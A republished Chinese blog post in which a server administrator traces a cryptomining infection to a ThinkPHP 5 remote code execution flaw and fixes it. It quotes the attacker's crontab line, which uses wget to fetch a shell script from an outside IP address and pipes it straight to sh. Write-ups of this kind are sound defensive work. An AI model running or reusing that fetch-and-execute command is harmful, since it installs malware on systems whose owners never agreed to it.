摘要:再看下的的權(quán)限就是的查看下幾個(gè)站的日志發(fā)現(xiàn)是利用最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞漏洞細(xì)節(jié)修復(fù)一下問(wèn)題解決但是這個(gè)站點(diǎn)是測(cè)試站點(diǎn)端口監(jiān)聽(tīng)的是��,難道現(xiàn)在黑客能開(kāi)始嗅探非常規(guī)端口了來(lái)源
昨天發(fā)現(xiàn) 一臺(tái)服務(wù)器突然慢了 top 顯示 幾個(gè)進(jìn)程100%以上的cpu使用
執(zhí)行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來(lái)源
last 沒(méi)有登陸記錄
先干掉這幾個(gè)進(jìn)程,但是幾分鐘之后又出現(xiàn)了
先看看這個(gè)木馬想干什么吧
netstat 看到 這個(gè)木馬開(kāi)啟了一個(gè)端口和國(guó)外的某個(gè)ip建立了連接
但是tcpdump了一小會(huì)兒 沒(méi)有發(fā)現(xiàn)任何數(shù)據(jù)傳遞
這他是想干啥��?
繼續(xù)查看日志吧
在cron日志中發(fā)現(xiàn)了www用戶(hù) 有一個(gè)crontab定時(shí)操作 基本就是這個(gè)問(wèn)題了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
順著下載了幾個(gè)問(wèn)題����,看了看 應(yīng)該是個(gè)挖礦的木馬程序
服務(wù)器上的www用戶(hù) 是安裝 lnmp 創(chuàng)建的,看了來(lái)源很可能就是web漏洞了���。
再看/tmp下的php的權(quán)限 就是www的
查看 lnmp下幾個(gè)站的日志 發(fā)現(xiàn)是利用 thinkphp 5最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞
漏洞細(xì)節(jié):https://nosec.org/home/detail...
修復(fù)一下問(wèn)題解決
但是 這個(gè)站點(diǎn)是測(cè)試站點(diǎn) 端口監(jiān)聽(tīng)的是 8083 �,難道現(xiàn)在黑客能開(kāi)始嗅探非常規(guī)端口了�����?
來(lái)源:https://www.simapple.com/425....
文章版權(quán)歸作者所有���,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為����,您可以聯(lián)系管理員刪除�。
轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/29821.html
